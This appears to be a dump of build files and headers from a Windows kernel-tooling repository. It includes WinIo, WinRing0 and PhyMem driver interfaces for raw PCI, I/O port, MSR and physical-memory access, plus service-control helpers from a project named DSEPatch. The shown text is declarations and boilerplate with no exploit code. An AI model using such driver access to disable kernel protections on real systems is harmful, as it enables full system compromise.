32 | DLL_DECLARE BOOL ReadPCI(DWORD busNum, DWORD devNum, DWORD funcNum,
33 | DWORD regOff, DWORD bytes, PVOID pValue);
34 | DLL_DECLARE BOOL WritePCI(DWORD busNum, DWORD devNum, DWORD funcNum,
35 | DWORD regOff, DWORD bytes, PVOID pValue);
36 |
37 | #ifdef __cplusplus
38 | }
39 | #endif
40 |
41 | #endif //__PMDLL_H
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiClient/AmsiClient.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 | Source Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/source/StripDebug/global.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | //disable nonmeaningful warnings.
4 | #pragma warning(disable: 4091) //'typedef ': ignored on left of '' when no variable is declared
5 | #pragma warning(disable: 4005) // macro redefinition
6 | #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
7 | #pragma warning(disable: 4054) // %s : from function pointer %s to data pointer %s
8 | #pragma warning(disable: 6102) // Using %s from failed function call at line %u
9 |
10 | #include
11 | #include
12 | #include "cui.h"
13 | #include "minirtl\minirtl.h"
14 | #include "minirtl\cmdline.h"
15 |
16 | #pragma comment(lib, "dbghelp.lib")
17 | #pragma comment(lib, "imagehlp.lib")
18 |
19 | #if !defined UNICODE
20 | #error ANSI build is not supported
21 | #endif
22 |
23 | #if defined (_MSC_VER)
24 | #if (_MSC_VER >= 1910)
25 | #ifdef _DEBUG
26 | #pragma comment(lib, "vcruntimed.lib")
27 | #pragma comment(lib, "ucrtd.lib")
28 | #else
29 | #pragma comment(lib, "libucrt.lib")
30 | #pragma comment(lib, "libvcruntime.lib")
31 | #endif
32 | #endif
33 | #endif
34 |
35 | #define IMAGE_DEBUG_TYPE_POGO 13
36 |
37 | PIMAGE_NT_HEADERS WINAPI CheckSumMappedFile(
38 | _In_ PVOID BaseAddress,
39 | _In_ DWORD FileLength,
40 | _Out_ PDWORD HeaderSum,
41 | _Out_ PDWORD CheckSum
42 | );
43 |
44 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/WinIo.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WinIo", "WinIo.vcproj", "{DE9A75D4-D640-41B8-893B-A384FAF00738}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Debug|Win32.Build.0 = Debug|Win32
16 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Debug|x64.ActiveCfg = Debug|x64
17 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Debug|x64.Build.0 = Debug|x64
18 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Release|Win32.ActiveCfg = Release|Win32
19 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Release|Win32.Build.0 = Release|Win32
20 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Release|x64.ActiveCfg = Release|x64
21 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/source/ROS/win32u/win32u/win32u.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DumpPhys", "DumpPhys\DumpPhys.csproj", "{1103585F-D85D-4599-8858-C0D3E9D7419F}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Any CPU = Debug|Any CPU
9 | Debug|x86 = Debug|x86
10 | Release|Any CPU = Release|Any CPU
11 | Release|x86 = Release|x86
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Debug|x86.ActiveCfg = Debug|x86
17 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Debug|x86.Build.0 = Debug|x86
18 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Release|Any CPU.ActiveCfg = Release|Any CPU
19 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Release|Any CPU.Build.0 = Release|Any CPU
20 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Release|x86.ActiveCfg = Release|x86
21 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Release|x86.Build.0 = Release|x86
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DumpPort", "DumpPort\DumpPort.csproj", "{8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Any CPU = Debug|Any CPU
9 | Debug|x86 = Debug|x86
10 | Release|Any CPU = Release|Any CPU
11 | Release|x86 = Release|x86
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Debug|x86.ActiveCfg = Debug|x86
17 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Debug|x86.Build.0 = Debug|x86
18 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Release|Any CPU.ActiveCfg = Release|Any CPU
19 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Release|Any CPU.Build.0 = Release|Any CPU
20 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Release|x86.ActiveCfg = Release|x86
21 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Release|x86.Build.0 = Release|x86
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/source/ROS/win32u/win32u/main.c:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT hfiref0x, 2018 - 2019
4 | *
5 | * TITLE: MAIN.C
6 | *
7 | * VERSION: 1.01
8 | *
9 | * DATE: 06 Dec 2019
10 | *
11 | * Syscall stubs for NtUser/NtGdi
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 |
20 | #if !defined UNICODE
21 | #error ANSI build is not supported
22 | #endif
23 |
24 | #if defined (_MSC_VER)
25 | #if (_MSC_VER >= 1900) //VS15, 17 etc
26 | #ifdef _DEBUG
27 | #pragma comment(lib, "vcruntimed.lib")
28 | #pragma comment(lib, "ucrtd.lib")
29 | #else
30 | #pragma comment(lib, "libucrt.lib")
31 | #pragma comment(lib, "libvcruntime.lib")
32 | #endif
33 | #endif
34 | #endif
35 |
36 | #include
37 |
38 | //
39 | // These files are machine generated, do not edit.
40 | //
41 | #ifdef _RELEASE_FOR_CHECKED
42 | #include "w32kcall_checked.h"
43 | #include "w32parguments_checked.h"
44 | #else
45 | #include "w32kcall.h"
46 | #include "w32parguments.h"
47 | #endif
48 |
49 | ULONG W32pServiceLimit = sizeof(W32pServiceArgumentTable);
50 |
--------------------------------------------------------------------------------
/source/StripDebug/cui.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2016 - 2018
4 | *
5 | * TITLE: CUI.H
6 | *
7 | * VERSION: 1.30
8 | *
9 | * DATE: 01 Aug 2018
10 | *
11 | * Common header file for console ui.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
21 | VOID cuiInitialize(
22 | _In_ BOOL InitInput,
23 | _Out_opt_ PBOOL IsConsoleOutput
24 | );
25 |
26 | #ifdef _UNICODE
27 | #define cuiPrintText cuiPrintTextW
28 | #define cuiPrintTextLastError cuiPrintTextLastErrorW
29 | #else
30 | #define cuiPrintText cuiPrintTextA
31 | #define cuiPrintTextLastError cuiPrintTextLastErrorA
32 | #endif
33 |
34 |
35 | VOID cuiPrintTextA(
36 | _In_ LPSTR lpText,
37 | _In_ BOOL UseReturn
38 | );
39 |
40 | VOID cuiPrintTextW(
41 | _In_ LPWSTR lpText,
42 | _In_ BOOL UseReturn
43 | );
44 |
45 | VOID cuiPrintTextLastErrorA(
46 | _In_ BOOL UseReturn
47 | );
48 |
49 | VOID cuiPrintTextLastErrorW(
50 | _In_ BOOL UseReturn
51 | );
52 |
53 | VOID cuiClrScr(
54 | VOID
55 | );
56 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/cui/cui.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2016 - 2018
4 | *
5 | * TITLE: CUI.H
6 | *
7 | * VERSION: 1.30
8 | *
9 | * DATE: 01 Aug 2018
10 | *
11 | * Common header file for console ui.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
21 | VOID cuiInitialize(
22 | _In_ BOOL InitInput,
23 | _Out_opt_ PBOOL IsConsoleOutput
24 | );
25 |
26 | #ifdef _UNICODE
27 | #define cuiPrintText cuiPrintTextW
28 | #define cuiPrintTextLastError cuiPrintTextLastErrorW
29 | #else
30 | #define cuiPrintText cuiPrintTextA
31 | #define cuiPrintTextLastError cuiPrintTextLastErrorA
32 | #endif
33 |
34 |
35 | VOID cuiPrintTextA(
36 | _In_ LPSTR lpText,
37 | _In_ BOOL UseReturn
38 | );
39 |
40 | VOID cuiPrintTextW(
41 | _In_ LPWSTR lpText,
42 | _In_ BOOL UseReturn
43 | );
44 |
45 | VOID cuiPrintTextLastErrorA(
46 | _In_ BOOL UseReturn
47 | );
48 |
49 | VOID cuiPrintTextLastErrorW(
50 | _In_ BOOL UseReturn
51 | );
52 |
53 | VOID cuiClrScr(
54 | VOID
55 | );
56 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/sys/OpenLibSys.rc:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | #define VER_FILETYPE VFT_DRV
5 | #define VER_FILESUBTYPE VFT2_DRV_SYSTEM
6 |
7 | #define VER_FILEDESCRIPTION_STR "WinRing0"
8 | #define VER_INTERNALNAME_STR "WinRing0.sys"
9 |
10 | /////////////////////////////////////////////////////////////////////////////
11 | //
12 | // Version
13 | //
14 |
15 | VS_VERSION_INFO VERSIONINFO
16 | FILEVERSION 1, 2, 0, 5
17 | PRODUCTVERSION 1, 2, 0, 5
18 | FILEFLAGSMASK 0x3fL
19 | FILEFLAGS 0x0L
20 | FILEOS 0x40004L
21 | FILETYPE 0x2L
22 | FILESUBTYPE 0x0L
23 | BEGIN
24 | BLOCK "StringFileInfo"
25 | BEGIN
26 | BLOCK "041104b0"
27 | BEGIN
28 | VALUE "Comments", "The modified BSD license\0"
29 | VALUE "CompanyName", "OpenLibSys.org\0"
30 | VALUE "FileDescription", "WinRing0\0"
31 | VALUE "FileVersion", "1.2.0.5\0"
32 | VALUE "InternalName", "WinRing0.sys\0"
33 | VALUE "LegalCopyright", "Copyright (C) 2007-2008 OpenLibSys.org. All rights reserved.\0"
34 | VALUE "OriginalFilename", "WinRing0.sys\0"
35 | VALUE "ProductName", "WinRing0\0"
36 | VALUE "ProductVersion", "1.2.0.5\0"
37 | END
38 | END
39 | BLOCK "VarFileInfo"
40 | BEGIN
41 | VALUE "Translation", 0x411, 1200
42 | END
43 | END
44 |
--------------------------------------------------------------------------------
/source/ROS/win32u/win32u.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29519.87
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "win32u", "win32u\win32u.vcxproj", "{8AF1DA16-D7F8-4814-BF5D-526456A574B2}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x86 = Debug|x86
11 | Release|x86 = Release|x86
12 | ReleaseForChecked|x86 = ReleaseForChecked|x86
13 | EndGlobalSection
14 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
15 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.Debug|x86.ActiveCfg = Debug|Win32
16 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.Debug|x86.Build.0 = Debug|Win32
17 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.Release|x86.ActiveCfg = Release|Win32
18 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.Release|x86.Build.0 = Release|Win32
19 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.ReleaseForChecked|x86.ActiveCfg = ReleaseForChecked|Win32
20 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.ReleaseForChecked|x86.Build.0 = ReleaseForChecked|Win32
21 | EndGlobalSection
22 | GlobalSection(SolutionProperties) = preSolution
23 | HideSolutionNode = FALSE
24 | EndGlobalSection
25 | GlobalSection(ExtensibilityGlobals) = postSolution
26 | SolutionGuid = {487B1FDE-0E17-47E1-80E2-16076184F850}
27 | EndGlobalSection
28 | EndGlobal
29 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DumpPhys")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("www.internals.com")]
12 | [assembly: AssemblyProduct("DumpPhys")]
13 | [assembly: AssemblyCopyright("Copyright © Yariv Kaplan 2010")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("16fd1afb-d769-4e14-89ba-eef3670c272b")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | [assembly: AssemblyVersion("1.0.0.0")]
33 | [assembly: AssemblyFileVersion("1.0.0.0")]
34 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DumpPort")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("www.internals.com")]
12 | [assembly: AssemblyProduct("DumpPort")]
13 | [assembly: AssemblyCopyright("Copyright © Yariv Kaplan 2010")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("e4aa10c8-3c4e-4ea5-8461-4da84bf602f5")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | [assembly: AssemblyVersion("1.0.0.0")]
33 | [assembly: AssemblyFileVersion("1.0.0.0")]
34 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PCIFlt/PCIFilter.h:
--------------------------------------------------------------------------------
1 | #ifndef __PCIFILTER_H
2 | #define __PCIFILTER_H
3 |
4 | typedef enum tagDEVICE_PNP_STATE
5 | {
6 | NotStarted=0, // Not started yet
7 | Started, // Device has received the START_DEVICE IRP
8 | StopPending, // Device has received the QUERY_STOP IRP
9 | Stopped, // Device has received the STOP_DEVICE IRP
10 | RemovePending, // Device has received the QUERY_REMOVE IRP
11 | SurpriseRemovePending, // Device has received the SURPRISE_REMOVE IRP
12 | Deleted // Device has received the REMOVE_DEVICE IRP
13 | } DEVICE_PNP_STATE;
14 |
15 | #define INITIALIZE_PNP_STATE(_Data_) \
16 | (_Data_)->DevicePnPState=NotStarted;\
17 | (_Data_)->PreviousPnPState=NotStarted;
18 |
19 | #define SET_NEW_PNP_STATE(_Data_, _state_) \
20 | (_Data_)->PreviousPnPState=(_Data_)->DevicePnPState; \
21 | (_Data_)->DevicePnPState=(_state_);
22 |
23 | #define RESTORE_PREVIOUS_PNP_STATE(_Data_) \
24 | (_Data_)->DevicePnPState=(_Data_)->PreviousPnPState;
25 |
26 | typedef struct tagDEVICE_EXTENSION
27 | {
28 | //physical device object
29 | PDEVICE_OBJECT pdo;
30 |
31 | //the device object we attached to
32 | PDEVICE_OBJECT lowerdo;
33 |
34 | //current pnp state
35 | DEVICE_PNP_STATE DevicePnPState;
36 |
37 | //previous pnp state
38 | DEVICE_PNP_STATE PreviousPnPState;
39 |
40 | //Remove Lock
41 | IO_REMOVE_LOCK rmLock;
42 |
43 | } DEVICE_EXTENSION, *PDEVICE_EXTENSION;
44 |
45 | #endif //__PCIFILTERZ_H
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/instdrv.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon
4 | *
5 | * TITLE: INSTDRV.H
6 | *
7 | * VERSION: 1.10
8 | *
9 | * DATE: 17 Apr 2017
10 | *
11 | * Common header file for the program SCM usage.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
21 | BOOL scmInstallDriver(
22 | _In_ SC_HANDLE SchSCManager,
23 | _In_ LPCTSTR DriverName,
24 | _In_opt_ LPCTSTR ServiceExe
25 | );
26 |
27 | BOOL scmStartDriver(
28 | _In_ SC_HANDLE SchSCManager,
29 | _In_ LPCTSTR DriverName
30 | );
31 |
32 | BOOL scmOpenDevice(
33 | _In_ LPCTSTR DriverName,
34 | _Inout_opt_ PHANDLE lphDevice
35 | );
36 |
37 | BOOL scmStopDriver(
38 | _In_ SC_HANDLE SchSCManager,
39 | _In_ LPCTSTR DriverName
40 | );
41 |
42 | BOOL scmRemoveDriver(
43 | _In_ SC_HANDLE SchSCManager,
44 | _In_ LPCTSTR DriverName
45 | );
46 |
47 | BOOL scmUnloadDeviceDriver(
48 | _In_ LPCTSTR Name
49 | );
50 |
51 | BOOL scmLoadDeviceDriver(
52 | _In_ LPCTSTR Name,
53 | _In_opt_ LPCTSTR Path,
54 | _Inout_ PHANDLE lphDevice
55 | );
56 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/OlsApi.def:
--------------------------------------------------------------------------------
1 | EXPORTS
2 |
3 | GetDllStatus @1
4 | GetDllVersion @2
5 | GetDriverVersion @3
6 | GetDriverType @4
7 |
8 | InitializeOls @7
9 | DeinitializeOls @8
10 |
11 | IsCpuid @11
12 | IsMsr @12
13 | IsTsc @13
14 |
15 | Hlt @20
16 | Rdmsr @21
17 | Wrmsr @22
18 | Rdpmc @23
19 | Cpuid @24
20 | Rdtsc @25
21 |
22 | HltTx @30
23 | RdmsrTx @31
24 | WrmsrTx @32
25 | RdpmcTx @33
26 | CpuidTx @34
27 | RdtscTx @35
28 |
29 | HltPx @40
30 | RdmsrPx @41
31 | WrmsrPx @42
32 | RdpmcPx @43
33 | CpuidPx @44
34 | RdtscPx @45
35 |
36 | ReadIoPortByte @51
37 | ReadIoPortWord @52
38 | ReadIoPortDword @53
39 | WriteIoPortByte @54
40 | WriteIoPortWord @55
41 | WriteIoPortDword @56
42 |
43 | ReadIoPortByteEx @61
44 | ReadIoPortWordEx @62
45 | ReadIoPortDwordEx @63
46 | WriteIoPortByteEx @64
47 | WriteIoPortWordEx @65
48 | WriteIoPortDwordEx @66
49 |
50 | SetPciMaxBusIndex @70
51 |
52 | ReadPciConfigByte @81
53 | ReadPciConfigWord @82
54 | ReadPciConfigDword @83
55 | WritePciConfigByte @84
56 | WritePciConfigWord @85
57 | WritePciConfigDword @86
58 | FindPciDeviceById @87
59 | FindPciDeviceByClass @88
60 |
61 | ReadPciConfigByteEx @91
62 | ReadPciConfigWordEx @92
63 | ReadPciConfigDwordEx @93
64 | WritePciConfigByteEx @94
65 | WritePciConfigWordEx @95
66 | WritePciConfigDwordEx @96
67 |
68 | ;ReadDmiMemory @100
69 | ;ReadPhysicalMemory @101
70 | ;WritePhysicalMemory @102
71 |
--------------------------------------------------------------------------------
/source/IntelNal/src/iqvlinux.spec:
--------------------------------------------------------------------------------
1 | Summary: QV Tools driver
2 | Name: iqvlinux
3 | Version: 1.1.4.5
4 | Release: 0
5 | BuildArch: noarch
6 | License: GPL
7 | Vendor: Intel
8 | Group: System Environment/Kernel
9 | URL: http://www.intel.com
10 |
11 | Source: iqvlinux.tar.gz
12 | BuildRoot: %{_tmppath}/%{name}-%{version}-root
13 |
14 |
15 | %description
16 | Network adapter driver for QV Tools.
17 |
18 | %prep
19 | %setup -c %{name} -n %{name}
20 |
21 | %build
22 |
23 | %install
24 | if [ -d %{buildroot} ]; then
25 | rm -fr %{buildroot}
26 | fi
27 | mkdir -p %{buildroot}/%{_datadir}/%{name}-%{version}-root
28 | make -f Makefile -C src/linux/driver \
29 | NALDIR=/usr/src/redhat/BUILD/%{name} \
30 | DESTDIR=%{buildroot}/%{_datadir}/%{name}-%{version}-root installrpm
31 |
32 | %post
33 | # V=1 if you want verbose output
34 | make -f Makefile -C %{_datadir}/%{name}-%{version}-root/src/linux/driver \
35 | NALDIR=%{_datadir}/%{name}-%{version}-root/
36 | %{_datadir}/%{name}-%{version}-root/src/linux/driver/nalinstall %{_datadir}/%{name}-%{version}-root/src/linux/driver
37 | rm -fr %{_datadir}/%{name}-%{version}-root/*
38 |
39 | %verifyscript
40 | if [ ! -e /lib/modules/`uname -r`/kernel/drivers/net/iqvlinux.ko ]
41 | then
42 | echo "QV Linux Driver is missing"
43 | exit 1
44 | fi
45 |
46 | %clean
47 | rm -fr %{buildroot}
48 |
49 | %files
50 | %defattr(-, root, root, 0755)
51 | %{_datadir}/%{name}-%{version}-root/
52 |
53 | %changelog
54 | * %(date "+%a %b %d %Y") %name %{version}
55 | - Automatic build.
56 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strstr.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | char *_strstr_a(const char *s, const char *sub_s)
4 | {
5 | char c0, c1, c2, *tmps, *tmpsub;
6 |
7 | if (s == sub_s)
8 | return (char *)s;
9 |
10 | if (s == 0)
11 | return 0;
12 |
13 | if (sub_s == 0)
14 | return 0;
15 |
16 | c0 = *sub_s;
17 | while (c0 != 0) {
18 |
19 | while (*s != 0) {
20 | c2 = *s;
21 | if (c2 == c0)
22 | break;
23 | s++;
24 | }
25 |
26 | if (*s == 0)
27 | return 0;
28 |
29 | tmps = (char *)s;
30 | tmpsub = (char *)sub_s;
31 | do {
32 | c1 = *tmps;
33 | c2 = *tmpsub;
34 | tmps++;
35 | tmpsub++;
36 | } while ((c1 == c2) && (c2 != 0));
37 |
38 | if (c2 == 0)
39 | return (char *)s;
40 |
41 | s++;
42 | }
43 | return 0;
44 | }
45 |
46 | wchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s)
47 | {
48 | wchar_t c0, c1, c2, *tmps, *tmpsub;
49 |
50 | if (s == sub_s)
51 | return (wchar_t *)s;
52 |
53 | if (s == 0)
54 | return 0;
55 |
56 | if (sub_s == 0)
57 | return 0;
58 |
59 | c0 = *sub_s;
60 | while (c0 != 0) {
61 |
62 | while (*s != 0) {
63 | c2 = *s;
64 | if (c2 == c0)
65 | break;
66 | s++;
67 | }
68 |
69 | if (*s == 0)
70 | return 0;
71 |
72 | tmps = (wchar_t *)s;
73 | tmpsub = (wchar_t *)sub_s;
74 | do {
75 | c1 = *tmps;
76 | c2 = *tmpsub;
77 | tmps++;
78 | tmpsub++;
79 | } while ((c1 == c2) && (c2 != 0));
80 |
81 | if (c2 == 0)
82 | return (wchar_t *)s;
83 |
84 | s++;
85 | }
86 | return 0;
87 | }
88 |
--------------------------------------------------------------------------------
/source/wdextract/wdextract.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.539
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "wdextract", "wdextract\wdextract.vcxproj", "{08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
